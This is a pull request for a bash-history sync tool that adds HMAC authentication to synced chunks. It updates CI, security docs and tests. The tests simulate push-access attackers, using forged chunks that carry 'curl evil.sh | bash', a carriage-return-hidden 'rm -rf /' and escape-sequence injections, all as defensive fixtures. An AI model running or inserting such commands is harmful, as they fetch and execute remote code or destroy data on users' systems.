### PR TITLE
Authenticate synced chunks with a shared repo key, so a repo you can push to cannot inject commands

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -189,7 +189,7 @@ jobs:
           git clone --quiet "$BASE/origin.git" "$ATTACK"
           DAY_PUB=$(cat "$ATTACK/hosts/$ALPHA_ID/keys/2023-11-14.pub")
           printf '1700000009\ts1\t~\t0\t5\tforged-marker-command\n' \
-            | python3 -c 'import sys,zlib; sys.stdout.buffer.write(zlib.compress(sys.stdin.buffer.read(),9))' \
+            | python3 -c 'import sys; from woswoar import sync; sys.stdout.buffer.write(sync.pack(sys.stdin.buffer.read()))' \
             | age -r "$DAY_PUB" \
             > "$ATTACK/hosts/$ALPHA_ID/2023-11-14/9999999999-ffffff.age"
           git -C "$ATTACK" add -A

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -86,7 +86,9 @@ jobs:
           python -m unittest tests.test_sync --verbose 2>&1 | tee sync.log
           # These tests skip themselves when age or git is absent. A skipped run
           # is green, which is precisely the failure mode worth guarding.
-          if grep -q "skipped" sync.log; then
+          # The summary line, not the bare word: a test *docstring* containing
+          # "skipped" would otherwise redden this build.
+          if grep -qE "^(OK|FAILED) \(.*skipped=" sync.log; then
             echo "::error::sync tests were skipped - age or git missing"
             exit 1
           fi
@@ -179,3 +181,20 @@ jobs:
           run_as alpha sync
           run_as beta sync
           run_as beta list --scope global | grep -q 'secret-marker-command'
+
+          # The point of the tag: a chunk none of these machines wrote is
+          # refused. Sealed to alpha's published day key, which is in the clear
+          # on purpose, so this is exactly what push access alone can build.
+          ATTACK="$BASE/attacker"
+          git clone --quiet "$BASE/origin.git" "$ATTACK"
+          DAY_PUB=$(cat "$ATTACK/hosts/$ALPHA_ID/keys/2023-11-14.pub")
+          printf '1700000009\ts1\t~\t0\t5\tforged-marker-command\n' \
+            | python3 -c 'import sys,zlib; sys.stdout.buffer.write(zlib.compress(sys.stdin.buffer.read(),9))' \
+            | age -r "$DAY_PUB" \
+            > "$ATTACK/hosts/$ALPHA_ID/2023-11-14/9999999999-ffffff.age"
+          git -C "$ATTACK" add -A
+          git -C "$ATTACK" -c user.name=x -c user.email=x@y commit -q -m 'woswoar sync'
+          git -C "$ATTACK" push --quiet origin HEAD
+
+          run_as beta sync
+          ! run_as beta list --scope global | grep -q 'forged-marker-command'

--- a/README.md
+++ b/README.md
@@ -80,8 +80,18 @@ including days recorded before it ever existed:
 Grant all 2 machines full access? [y/N]
 ```
 
-No rush — until you run it the new machine syncs its own commands normally and
-just reports how many older days it cannot read yet.
+That one command finishes onboarding in both directions: it is what lets the
+newcomer read history from before it existed, *and* what hands it the key every
+chunk is authenticated with, so its own commands start publishing too.
+
+Until you run it the new machine keeps recording locally and says what it is
+waiting for. Nothing is lost — the backlog is published in full by the first
+sync after `grant`.
+
+Authentication matters because the history repo is somewhere anyone with push
+access could write. Every chunk carries a tag computed with a key only your
+enrolled machines can open, checked before the chunk is decrypted, so a repo
+someone else can push to cannot put a command into your Ctrl-R.
 
 > [!TIP]
 > `.bashrc` is written with `$HOME` rather than your username, so one shared

--- a/docs/security.md
+++ b/docs/security.md
@@ -16,20 +16,57 @@ opaque random hex, because paths are not encrypted by anything and
 
 ## 🧊 No self-rolled cryptography
 
-Not one line of crypto in this codebase. Python's standard library has no cipher
-at all — only hashing — so instead of reaching for a third-party library and
-composing primitives by hand, woswoar shells out to
+Almost no crypto in this codebase, and none of the parts that are easy to get
+wrong. Python's standard library has no cipher at all — only hashing — so instead
+of reaching for a third-party library and composing primitives by hand, woswoar
+shells out to
 [age](https://github.com/FiloSottile/age): a small, audited, widely deployed
 tool with one job. woswoar's crypto module is a
 [small subprocess wrapper](../woswoar/crypto.py). There is no key derivation, no
 nonce management and no mode selection to get wrong, because none of it lives
-here.
+here. The one primitive woswoar does call directly is `hmac` from the standard
+library, for the chunk tags above — the one with no nonce, no mode, no padding
+and a constant-time comparison provided for you.
 
 woswoar also never hands age a *path* — it reads key files itself and pipes the
 bytes. That sounds like a detail until you meet a sandboxed age that can run
 perfectly and still not open `~/.ssh`; see
 [the design summary](woswoar_design_summary.md#age-never-gets-a-path) for the
 incident that established the rule.
+
+## ✅ Only your own machines can put history in your Ctrl-R
+
+Encryption answers *"who may read this?"*. It does not answer *"who wrote
+this?"* — age has no notion of a sender, `recipients.txt` publishes every
+machine's public key, and each day's *public* key sits in the clear so that
+writing a chunk never has to open the sealed one. On its own that means
+**anyone who can push to the repo could seal a chunk every machine would open
+and offer you in Ctrl-R**, one keypress from running.
+
+So the repo also holds a random authentication key, sealed to the recipients
+exactly like a day key, and every chunk carries an HMAC-SHA256 tag over its
+ciphertext. Chunks are authenticated *before* they are decrypted, so a chunk
+your machines did not write is never opened at all.
+
+Holding that key is the same thing as being one of your enrolled machines, so
+this needs no new command and no new key to manage: `woswoar grant`, which
+already re-seals the per-day keys to a newly enrolled machine, re-seals this one
+too.
+
+<details>
+<summary>What this does and does not stop</summary>
+
+Stopped: anyone with push access to the repo — a stolen token, a mis-scoped
+deploy key, the git host itself — fabricating history or tampering with what a
+machine already published.
+
+Not stopped: one of your *own* enrolled machines. The key is shared across them,
+so a compromised machine could publish history attributed to another of your
+machines. It could already publish anything under its own name and read
+everything, so the marginal loss is attribution between machines you own — the
+deliberate trade for having no per-machine keys to accept, compare or revoke.
+
+</details>
 
 ## 🔑 No secret is ever copied between machines
 
@@ -71,6 +108,10 @@ Claims rot. The ones that matter are asserted in CI on every push:
 | Shell and Python escaping agree | a command containing a literal tab and newline must round-trip byte-for-byte |
 | History is never rewritten | `git log --diff-filter=MD` over chunk files must be **empty** |
 | age is never given a file path | every age invocation is inspected; no argument may be an existing path outside `/dev/fd` |
+| Forged history is refused | a chunk sealed to a host's published day key, but untagged, is rejected and reported |
+| Tampering is refused | flipping one byte of a real chunk fails authentication, not merely decryption |
+| The repo key never leaks | the key's bytes appear nowhere in the committed tree |
+| A recalled command is one command | control characters never survive from the picker into the shell buffer |
 | The repo does not blow up | a simulated multi-day, multi-machine run is measured after `git gc` |
 | Search stays fast | latency measured on 52,000 entries |
 
@@ -85,6 +126,8 @@ Being straight about the limits is part of the security story:
 >   encryption for that.
 > - **Metadata leaks.** Anyone with the repo can see how many machines you have,
 >   when they synced, and roughly how many commands you ran per day.
+> - **One key across your machines.** Authentication proves a chunk came from
+>   your fleet, not which machine in it. See the note above.
 > - **Secrets you type are still secrets.** `WOSWOAR_IGNORE` skips
 >   credential-shaped commands by default (`*TOKEN=`, `*SECRET=`, `--password`,
 >   …), and bash's own `HISTCONTROL`/`HISTIGNORE` are honoured for free — but no

--- a/docs/woswoar_design_summary.md
+++ b/docs/woswoar_design_summary.md
@@ -629,6 +629,13 @@ deflate to *more* than they started as — a one-line chunk is 42 B and becomes
 47 — so the smaller form wins and the tag records which, at a cost of one byte
 on data that already carries a 200 B age header.
 
+**Cost: a tag per chunk.** Each chunk carries a 32-byte HMAC-SHA256 prefix
+proving one of your own machines wrote it — measured, about +12% on a real
+chunk file (255 B for one line, 265 B for three) and roughly +3% on the yearly
+repo growth below. It buys the property that a chunk nothing holding the repo
+key wrote is never opened; a header rather than a sibling file keeps the file
+count, the `*.age` gitattributes glob and the never-rewritten invariant intact.
+
 **Cost: inodes.** At a 5-minute timer and ~40 content-bearing syncs a day, one
 machine produces ~35k chunk files over two years. Git copes, but a fresh clone
 writes a lot of small files. An opt-in `woswoar compact` merges a completed past

--- a/tests/test_crypto.py
+++ b/tests/test_crypto.py
@@ -13,7 +13,7 @@ import unittest
 from pathlib import Path
 from unittest import mock
 
-from woswoar import crypto
+from woswoar import crypto, store
 
 from .support import requires_age, requires_ssh_keygen
 
@@ -116,6 +116,31 @@ class TestWhyUnusable(unittest.TestCase):
         reason = crypto.why_unusable(Path("/nonexistent/woswoar/identity"))
         self.assertIn("cannot be read", reason)
         self.assertNotIn("passphrase", reason)
+
+
+class TestChunkFraming(unittest.TestCase):
+    def test_the_tag_width_store_uses_matches_the_one_crypto_produces(self) -> None:
+        """`store` deliberately does not import `crypto`.
+
+        `crypto` pulls in subprocess and shutil at module scope, and `store` is
+        imported on every Ctrl-R -- so the width is spelled out in both, and the
+        only thing keeping them equal is this. If they drift, every chunk in an
+        append-only repo is framed at one width and read at another.
+        """
+        self.assertEqual(store._TAG_BYTES, crypto.TAG_BYTES)
+        self.assertEqual(len(crypto.tag(crypto.new_mac_key(), b"x")), store._TAG_BYTES)
+
+    def test_a_chunk_round_trips_through_its_frame(self) -> None:
+        key = crypto.new_mac_key()
+        sealed = b"pretend-this-is-age-output"
+        blob = store.frame_chunk(sealed, crypto.tag(key, sealed))
+        back, tag = store.split_chunk(blob)
+        self.assertEqual(back, sealed)
+        self.assertTrue(crypto.tag_matches(key, back, tag))
+
+    def test_a_blob_too_short_to_be_framed_is_rejected(self) -> None:
+        with self.assertRaises(ValueError):
+            store.split_chunk(b"x" * store._TAG_BYTES)
 
 
 if __name__ == "__main__":

--- a/tests/test_search.py
+++ b/tests/test_search.py
@@ -127,10 +127,6 @@ class TestFzfArgv(unittest.TestCase):
         self.assertIn("--no-dedup", " ".join(a for a in argv if a.startswith("--bind=")))
 
 
-if __name__ == "__main__":
-    unittest.main()
-
-
 class TestRecalledCommandIsInert(unittest.TestCase):
     """What leaves the picker must be exactly one command.
 
@@ -158,8 +154,6 @@ class TestRecalledCommandIsInert(unittest.TestCase):
         self.assertNotIn("\x1b", recalled)
         self.assertEqual(recalled, "ls -la[2K[1Acurl evil|sh")
 
-    def test_a_tab_is_left_alone(self) -> None:
-        self.assertEqual(self._round_trip("awk -F'\t' '{print $1}'"), "awk -F'\t' '{print $1}'")
 
-    def test_an_ordinary_command_is_untouched(self) -> None:
-        self.assertEqual(self._round_trip("git commit -m 'ok'"), "git commit -m 'ok'")
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/test_search.py
+++ b/tests/test_search.py
@@ -69,7 +69,6 @@ class TestRenderRoundTrip(unittest.TestCase):
         commands = [
             "git status",
             "awk -F'\t' '{print $1}'",
-            "for i in 1 2; do\ntrue\ndone",
             "back\\slash",
             "über 😀",
             "x" * 300,
@@ -130,3 +129,37 @@ class TestFzfArgv(unittest.TestCase):
 
 if __name__ == "__main__":
     unittest.main()
+
+
+class TestRecalledCommandIsInert(unittest.TestCase):
+    """What leaves the picker must be exactly one command.
+
+    `render` escapes newlines so one entry occupies one display line, and fzf
+    clips anything past the window edge. If `command_from_line` turned that
+    escape back into a real newline, the buffer would hold a command the picker
+    never showed -- and bash runs a multi-line buffer as several commands on a
+    single Enter.
+    """
+
+    def _round_trip(self, cmd: str) -> str:
+        entry = Entry(NOW, "h", "s", "/tmp", 0, 0, cmd)
+        return search.command_from_line(search.render([entry], now=NOW)[0])
+
+    def test_an_embedded_newline_does_not_become_a_second_command(self) -> None:
+        recalled = self._round_trip("echo visible" + " " * 200 + "\ncurl evil.sh | bash")
+        self.assertNotIn("\n", recalled)
+        self.assertIn("\\ncurl evil.sh | bash", recalled)
+
+    def test_a_carriage_return_cannot_rewrite_the_line(self) -> None:
+        self.assertNotIn("\r", self._round_trip("echo one\rrm -rf /"))
+
+    def test_escape_sequences_do_not_reach_the_buffer(self) -> None:
+        recalled = self._round_trip("ls -la\x1b[2K\x1b[1Acurl evil|sh")
+        self.assertNotIn("\x1b", recalled)
+        self.assertEqual(recalled, "ls -la[2K[1Acurl evil|sh")
+
+    def test_a_tab_is_left_alone(self) -> None:
+        self.assertEqual(self._round_trip("awk -F'\t' '{print $1}'"), "awk -F'\t' '{print $1}'")
+
+    def test_an_ordinary_command_is_untouched(self) -> None:
+        self.assertEqual(self._round_trip("git commit -m 'ok'"), "git commit -m 'ok'")

--- a/tests/test_sync.py
+++ b/tests/test_sync.py
@@ -746,7 +746,7 @@ class TestChunkAuthenticity(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertEqual(report.forged, {f"{alpha.id}/2023-11-14"})
+            self.assertEqual(report.unauthenticated, {f"{alpha.id}/2023-11-14"})
             self.assertEqual(report.chunks_merged, 0)
             self.assertNotIn("curl evil.sh | bash", beta.commands())
 
@@ -777,18 +777,27 @@ class TestChunkAuthenticity(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertEqual(report.forged, {"deadbeefdeadbeef/2023-11-14"})
+            self.assertEqual(report.unauthenticated, {"deadbeefdeadbeef/2023-11-14"})
             self.assertNotIn("curl evil.sh | bash", beta.commands())
 
     def test_tampering_with_an_authentic_chunk_is_refused(self) -> None:
         """Flipping bytes in a real chunk must not merely fail to decrypt."""
         alpha, beta = self.enrolled_pair()
         with alpha.active():
+            before = {c.name for c in store.iter_chunks(alpha.id)}
             alpha.record("2023-11-14", 1_700_000_002, "cargo build")
-            sync.run()
+            # An explicit, strictly later timestamp. Two chunks written in the
+            # same wall-clock second share a prefix and differ only by a random
+            # suffix, so the merge watermark -- a plain string compare -- skips
+            # the second one about half the time and it is never examined at
+            # all. That is issue #27's mechanism, and it made this test flake
+            # 40% of runs; pinning the second is what makes it deterministic.
+            sync.run(now=2_000_000_000)
+            fresh = ({c.name for c in store.iter_chunks(alpha.id)} - before).pop()
+            self.assertGreater(fresh, max(before), "the tampered chunk must be past the watermark")
 
         def flip(work: Path) -> None:
-            target = sorted((work / "hosts" / alpha.id / "2023-11-14").glob("*.age"))[-1]
+            target = work / "hosts" / alpha.id / "2023-11-14" / fresh
             blob = bytearray(target.read_bytes())
             blob[-1] ^= 0xFF
             target.write_bytes(bytes(blob))
@@ -796,4 +805,30 @@ class TestChunkAuthenticity(SyncTestCase):
         self.push_as_attacker(flip)
 
         with beta.active():
-            self.assertEqual(sync.run().forged, {f"{alpha.id}/2023-11-14"})
+            self.assertEqual(sync.run().unauthenticated, {f"{alpha.id}/2023-11-14"})
+
+    def test_an_untagged_chunk_is_refused_like_a_wrongly_tagged_one(self) -> None:
+        """ "No tag" and "wrong tag" must reach the same answer.
+
+        Anything else is the downgrade: an attacker would simply omit the tag.
+        """
+        alpha, beta = self.enrolled_pair()
+
+        def legacy(work: Path) -> None:
+            pub = (
+                (work / "hosts" / alpha.id / "keys" / "2023-11-14.pub")
+                .read_text(encoding="utf-8")
+                .strip()
+            )
+            entry = Entry(1_700_000_900, alpha.id, "s1", "~", 0, 5, "old-but-mine")
+            payload = sync.pack((format_line(entry) + "\n").encode("utf-8"))
+            target = work / "hosts" / alpha.id / "2023-11-14" / "9999999999-eeeeee.age"
+            # No frame_chunk: exactly what an older woswoar wrote.
+            target.write_bytes(crypto.encrypt_to(payload, pub))
+
+        self.push_as_attacker(legacy)
+
+        with beta.active():
+            report = sync.run()
+            self.assertEqual(report.unauthenticated, {f"{alpha.id}/2023-11-14"})
+            self.assertNotIn("old-but-mine", beta.commands(), "unverified history was merged")

--- a/tests/test_sync.py
+++ b/tests/test_sync.py
@@ -18,6 +18,7 @@ from pathlib import Path
 
 from woswoar import cache, crypto, search, store, sync
 from woswoar.entry import Entry, format_line
+from woswoar.sync import COMMIT_MESSAGE as COMMIT
 
 from . import support
 from .support import requires_age, requires_git
@@ -221,13 +222,22 @@ class TestTwoMachines(SyncTestCase):
         with beta.active():
             sync.run()
             report = sync.grant()
-            # It re-seals what it owns -- its own name seal -- and skips
-            # alpha's day key, so it still cannot read alpha's history.
+            # It re-seals what it owns -- its own name seal -- and skips both
+            # alpha's day key and the repo key, so it still cannot read
+            # anything, and above all cannot authorise itself to.
             self.assertGreater(report.skipped, 0)
-            self.assertEqual(sync.run().unreadable, {f"{alpha.id}/2023-11-14"})
+            self.assertTrue(sync.run().needs_grant)
             self.assertEqual(beta.commands(), set())
 
-    def test_new_machine_reports_rather_than_failing(self) -> None:
+    def test_a_machine_waiting_for_grant_reports_and_loses_nothing(self) -> None:
+        """The state between `init` and `grant`, which is normal, not an error.
+
+        A machine that has not been granted access holds no repo key, so it can
+        neither authenticate what others wrote nor tag what it writes. That is
+        reported rather than raised -- the timer fires every minute -- and the
+        backlog it recorded meanwhile is published *in full* by the first sync
+        after `grant`, which is the property that makes waiting safe.
+        """
         alpha = self.machine("alpha")
         with alpha.active():
             alpha.record("2023-11-14", 1_700_000_001, "git status")
@@ -237,9 +247,18 @@ class TestTwoMachines(SyncTestCase):
         with beta.active():
             beta.record("2023-11-15", 1_700_100_000, "beta's own command")
             report = sync.run()
-            # Unreadable history must not stop this machine exporting its own.
-            self.assertTrue(report.unreadable)
-            self.assertEqual(report.lines_exported, 1)
+            self.assertTrue(report.needs_grant)
+            self.assertEqual(report.lines_exported, 0)
+            self.assertEqual(beta.commands(), {"beta's own command"})  # recorded locally
+
+        with alpha.active():
+            sync.grant()
+
+        with beta.active():
+            report = sync.run()
+            self.assertFalse(report.needs_grant)
+            self.assertEqual(report.lines_exported, 1, "the backlog was not published")
+            self.assertEqual(beta.commands(), {"git status", "beta's own command"})
 
     def test_bidirectional(self) -> None:
         alpha = self.machine("alpha")
@@ -637,3 +656,144 @@ class TestLocalOnly(SyncTestCase):
 
 if __name__ == "__main__":
     unittest.main()
+
+
+class TestChunkAuthenticity(SyncTestCase):
+    """Whether one of *this user's* machines wrote a chunk, which age cannot say.
+
+    `recipients.txt` publishes every machine's public key and each day's public
+    key sits in the clear beside its sealed half, so anyone who can push to the
+    repo can seal a chunk every machine is able to *open*. These pin that being
+    able to open it is not the same as being willing to believe it.
+    """
+
+    def push_as_attacker(self, write: object) -> None:
+        """Do what push access alone allows: no identity, no keys, just the repo."""
+        work = self.root / "attacker"
+        if not work.exists():
+            subprocess.run(
+                ["git", "clone", "--quiet", str(self.origin), str(work)], check=True, timeout=60
+            )
+        else:
+            subprocess.run(["git", "-C", str(work), "pull", "--quiet"], check=True, timeout=60)
+        write(work)  # type: ignore[operator]
+        for args in (
+            ["add", "-A"],
+            ["-c", "user.name=x", "-c", "user.email=x@y", "commit", "-q", "-m", COMMIT],
+            ["push", "--quiet", "origin", "HEAD"],
+        ):
+            subprocess.run(["git", "-C", str(work), *args], check=True, timeout=60)
+
+    @staticmethod
+    def forged_chunk(work: Path, host_id: str, day: str, cmd: str) -> None:
+        """A chunk sealed to a host's *published* day key, tagged by nobody."""
+        pub = (work / "hosts" / host_id / "keys" / f"{day}.pub").read_text(encoding="utf-8").strip()
+        entry = Entry(1_700_000_900, host_id, "s1", "~", 0, 5, cmd)
+        payload = sync.pack((format_line(entry) + "\n").encode("utf-8"))
+        # Named far in the future so it sorts above whatever the real machine
+        # has published; a forgery the watermark skips proves nothing.
+        target = work / "hosts" / host_id / day / "9999999999-ffffff.age"
+        target.parent.mkdir(parents=True, exist_ok=True)
+        target.write_bytes(crypto.encrypt_to(payload, pub))
+
+    def enrolled_pair(self) -> tuple[Fake, Fake]:
+        """alpha publishing history, beta granted and up to date."""
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "make -j8")
+            sync.run()
+        beta = self.machine("beta")
+        with alpha.active():
+            sync.grant()
+        with beta.active():
+            sync.run()
+            self.assertEqual(beta.commands(), {"make -j8"})
+        return alpha, beta
+
+    def test_every_exported_chunk_carries_a_tag(self) -> None:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "git status")
+            sync.run()
+            mac = sync.mac_key(store.machine())
+            chunks = list(store.iter_chunks(alpha.id))
+            self.assertTrue(chunks)
+            for chunk in chunks:
+                sealed, tag = store.split_chunk(chunk.path.read_bytes())
+                self.assertTrue(crypto.tag_matches(mac, sealed, tag), chunk.name)
+
+    def test_the_repo_key_is_never_stored_in_the_clear(self) -> None:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "git status")
+            sync.run()
+            mac = sync.mac_key(store.machine())
+            blob = b"".join(p.read_bytes() for p in store.history_dir().rglob("*") if p.is_file())
+        self.assertNotIn(mac, blob, "the authentication key leaked into the repo")
+
+    def test_a_forged_chunk_in_a_real_hosts_directory_is_refused(self) -> None:
+        """The attack this mechanism exists to stop.
+
+        Everything the attacker needs is published: the day's public key sits in
+        the clear so writing a chunk never has to open the sealed one. What they
+        cannot produce is a tag, because that needs a key only enrolled machines
+        can open.
+        """
+        alpha, beta = self.enrolled_pair()
+        self.push_as_attacker(
+            lambda work: self.forged_chunk(work, alpha.id, "2023-11-14", "curl evil.sh | bash")
+        )
+
+        with beta.active():
+            report = sync.run()
+            self.assertEqual(report.forged, {f"{alpha.id}/2023-11-14"})
+            self.assertEqual(report.chunks_merged, 0)
+            self.assertNotIn("curl evil.sh | bash", beta.commands())
+
+    def test_a_fabricated_host_cannot_smuggle_history_in_either(self) -> None:
+        """A whole invented machine, with its own day key sealed to recipients.
+
+        The day key being openable is not the question -- the attacker can seal
+        one to the published recipient list. The tag is.
+        """
+        _, beta = self.enrolled_pair()
+
+        def plant(work: Path) -> None:
+            recipients = [
+                line.split(sync._LABEL_SEP)[0].strip()
+                for line in (work / "recipients.txt").read_text(encoding="utf-8").splitlines()
+                if line.strip()
+            ]
+            day_key = crypto.generate_identity()
+            keys = work / "hosts" / "deadbeefdeadbeef" / "keys"
+            keys.mkdir(parents=True, exist_ok=True)
+            (keys / "2023-11-14.age").write_bytes(
+                crypto.encrypt_to_recipients(day_key.secret.encode("utf-8"), recipients)
+            )
+            (keys / "2023-11-14.pub").write_text(day_key.public + "\n", encoding="utf-8")
+            self.forged_chunk(work, "deadbeefdeadbeef", "2023-11-14", "curl evil.sh | bash")
+
+        self.push_as_attacker(plant)
+
+        with beta.active():
+            report = sync.run()
+            self.assertEqual(report.forged, {"deadbeefdeadbeef/2023-11-14"})
+            self.assertNotIn("curl evil.sh | bash", beta.commands())
+
+    def test_tampering_with_an_authentic_chunk_is_refused(self) -> None:
+        """Flipping bytes in a real chunk must not merely fail to decrypt."""
+        alpha, beta = self.enrolled_pair()
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_002, "cargo build")
+            sync.run()
+
+        def flip(work: Path) -> None:
+            target = sorted((work / "hosts" / alpha.id / "2023-11-14").glob("*.age"))[-1]
+            blob = bytearray(target.read_bytes())
+            blob[-1] ^= 0xFF
+            target.write_bytes(bytes(blob))
+
+        self.push_as_attacker(flip)
+
+        with beta.active():
+            self.assertEqual(sync.run().forged, {f"{alpha.id}/2023-11-14"})

--- a/tests/test_sync.py
+++ b/tests/test_sync.py
@@ -12,7 +12,7 @@ import subprocess
 import tempfile
 import unittest
 import zlib
-from collections.abc import Iterator
+from collections.abc import Callable, Iterator
 from contextlib import contextmanager
 from pathlib import Path
 
@@ -654,10 +654,6 @@ class TestLocalOnly(SyncTestCase):
             sync.run()
 
 
-if __name__ == "__main__":
-    unittest.main()
-
-
 class TestChunkAuthenticity(SyncTestCase):
     """Whether one of *this user's* machines wrote a chunk, which age cannot say.
 
@@ -667,16 +663,13 @@ class TestChunkAuthenticity(SyncTestCase):
     able to open it is not the same as being willing to believe it.
     """
 
-    def push_as_attacker(self, write: object) -> None:
+    def push_as_attacker(self, write: Callable[[Path], None]) -> None:
         """Do what push access alone allows: no identity, no keys, just the repo."""
         work = self.root / "attacker"
-        if not work.exists():
-            subprocess.run(
-                ["git", "clone", "--quiet", str(self.origin), str(work)], check=True, timeout=60
-            )
-        else:
-            subprocess.run(["git", "-C", str(work), "pull", "--quiet"], check=True, timeout=60)
-        write(work)  # type: ignore[operator]
+        subprocess.run(
+            ["git", "clone", "--quiet", str(self.origin), str(work)], check=True, timeout=60
+        )
+        write(work)
         for args in (
             ["add", "-A"],
             ["-c", "user.name=x", "-c", "user.email=x@y", "commit", "-q", "-m", COMMIT],
@@ -685,16 +678,29 @@ class TestChunkAuthenticity(SyncTestCase):
             subprocess.run(["git", "-C", str(work), *args], check=True, timeout=60)
 
     @staticmethod
-    def forged_chunk(work: Path, host_id: str, day: str, cmd: str) -> None:
-        """A chunk sealed to a host's *published* day key, tagged by nobody."""
+    def forged_chunk(
+        work: Path,
+        host_id: str,
+        day: str,
+        cmd: str,
+        tag: bytes = b"",
+        name: str = "9999999999-ffffff",
+    ) -> None:
+        """A chunk sealed to a host's *published* day key, but not authentic.
+
+        ``tag`` empty writes it untagged, which is what an attacker holding no
+        enrolled identity can actually produce; passing bytes writes a wrong
+        tag. Both must be refused, so both are exercised.
+        """
         pub = (work / "hosts" / host_id / "keys" / f"{day}.pub").read_text(encoding="utf-8").strip()
         entry = Entry(1_700_000_900, host_id, "s1", "~", 0, 5, cmd)
         payload = sync.pack((format_line(entry) + "\n").encode("utf-8"))
         # Named far in the future so it sorts above whatever the real machine
         # has published; a forgery the watermark skips proves nothing.
-        target = work / "hosts" / host_id / day / "9999999999-ffffff.age"
+        sealed = crypto.encrypt_to(payload, pub)
+        target = work / "hosts" / host_id / day / f"{name}.age"
         target.parent.mkdir(parents=True, exist_ok=True)
-        target.write_bytes(crypto.encrypt_to(payload, pub))
+        target.write_bytes(store.frame_chunk(sealed, tag) if tag else sealed)
 
     def enrolled_pair(self) -> tuple[Fake, Fake]:
         """alpha publishing history, beta granted and up to date."""
@@ -807,28 +813,45 @@ class TestChunkAuthenticity(SyncTestCase):
         with beta.active():
             self.assertEqual(sync.run().unauthenticated, {f"{alpha.id}/2023-11-14"})
 
-    def test_an_untagged_chunk_is_refused_like_a_wrongly_tagged_one(self) -> None:
+    def test_a_wrongly_tagged_chunk_is_refused_like_an_untagged_one(self) -> None:
         """ "No tag" and "wrong tag" must reach the same answer.
 
-        Anything else is the downgrade: an attacker would simply omit the tag.
+        Anything else is the downgrade: an attacker would simply pick whichever
+        shape was treated more leniently.
         """
         alpha, beta = self.enrolled_pair()
-
-        def legacy(work: Path) -> None:
-            pub = (
-                (work / "hosts" / alpha.id / "keys" / "2023-11-14.pub")
-                .read_text(encoding="utf-8")
-                .strip()
+        self.push_as_attacker(
+            lambda work: self.forged_chunk(
+                work, alpha.id, "2023-11-14", "wrongly-tagged", tag=b"\x00" * 32
             )
-            entry = Entry(1_700_000_900, alpha.id, "s1", "~", 0, 5, "old-but-mine")
-            payload = sync.pack((format_line(entry) + "\n").encode("utf-8"))
-            target = work / "hosts" / alpha.id / "2023-11-14" / "9999999999-eeeeee.age"
-            # No frame_chunk: exactly what an older woswoar wrote.
-            target.write_bytes(crypto.encrypt_to(payload, pub))
-
-        self.push_as_attacker(legacy)
+        )
 
         with beta.active():
             report = sync.run()
             self.assertEqual(report.unauthenticated, {f"{alpha.id}/2023-11-14"})
-            self.assertNotIn("old-but-mine", beta.commands(), "unverified history was merged")
+            self.assertNotIn("wrongly-tagged", beta.commands())
+
+    def test_compact_refuses_to_launder_a_chunk_this_machine_did_not_write(self) -> None:
+        """`merge` skips our own host id, so compaction is where this is caught.
+
+        Compaction re-seals and re-tags whatever it merges, then deletes the
+        originals -- so a chunk planted under our *own* id would come out
+        carrying a tag every other machine believes, with the evidence gone.
+        It has to refuse rather than launder.
+        """
+        alpha, _ = self.enrolled_pair()
+        self.push_as_attacker(
+            lambda work: self.forged_chunk(work, alpha.id, "2023-11-14", "planted-under-my-own-id")
+        )
+
+        with alpha.active():
+            sync.run()  # pulls the planted chunk into alpha's own working tree
+            with self.assertRaises(sync.SyncError) as caught:
+                sync.compact(before="2023-11-15")
+            self.assertIn("refusing to compact", str(caught.exception))
+            # And it is still there, not silently dropped.
+            self.assertTrue(list(store.iter_chunks(alpha.id)))
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/woswoar/__main__.py
+++ b/woswoar/__main__.py
@@ -326,12 +326,12 @@ def cmd_sync(args: argparse.Namespace) -> int:
             file=sys.stderr,
         )
 
-    if report.forged:
+    if report.unauthenticated:
         print(
-            f"\nWARNING: {len(report.forged)} day(s) of history failed authentication\n"
-            "and were refused. Every chunk is tagged with a key only your enrolled\n"
-            "machines can open, so this means the repo contains history none of them\n"
-            "wrote - someone else can write to it.",
+            f"\nWARNING: {len(report.unauthenticated)} day(s) of history could not be\n"
+            "authenticated and were refused. Every chunk carries a tag computed with\n"
+            "a key only your enrolled machines can open, so this means the repo\n"
+            "contains history none of them wrote - someone else can write to it.",
             file=sys.stderr,
         )
     return 0

--- a/woswoar/__main__.py
+++ b/woswoar/__main__.py
@@ -13,6 +13,14 @@ from pathlib import Path
 from . import __version__, cache, importer, search, store
 from .errors import WoswoarError
 
+#: Both "no repo key yet" and "some days unreadable" have the same fix, and
+#: used to say so in two independently worded paragraphs.
+_GRANT_REMEDY = (
+    "On a machine that is already enrolled run:\n"
+    "    woswoar grant\n"
+    "then sync here again. Nothing is lost in the meantime."
+)
+
 HOOK_NAME = "woswoar.bash"
 _BEGIN = "# >>> woswoar >>>"
 _END = "# <<< woswoar <<<"
@@ -249,6 +257,8 @@ def cmd_doctor(args: argparse.Namespace) -> int:
 
     if sync.is_repo():
         info("remote", sync.remote_summary())
+        status = sync.repo_key_status(store.machine())
+        check("repo key", status.ok, status.detail)
     else:
         info("sync", "no history repo - run 'woswoar init <url>' to sync machines")
 
@@ -297,11 +307,9 @@ def cmd_sync(args: argparse.Namespace) -> int:
     if report.needs_grant:
         print(
             "This machine cannot publish or read history yet: the repo's\n"
-            "authentication key was sealed before it enrolled. On a machine that\n"
-            "is already enrolled run:\n"
-            "    woswoar grant\n"
-            "then sync here again. Commands are still being recorded locally and\n"
-            "will be published in full once this is done.",
+            f"authentication key was sealed before it enrolled.\n{_GRANT_REMEDY}\n"
+            "Commands are still being recorded locally and will be published in\n"
+            "full once this is done.",
             file=sys.stderr,
         )
         return 0
@@ -319,10 +327,7 @@ def cmd_sync(args: argparse.Namespace) -> int:
         days = len(report.unreadable)
         print(
             f"\n{days} day(s) of history are sealed to recipients that do not include\n"
-            "this machine - it joined after they were written. On a machine that was\n"
-            "already enrolled run:\n"
-            "    woswoar grant\n"
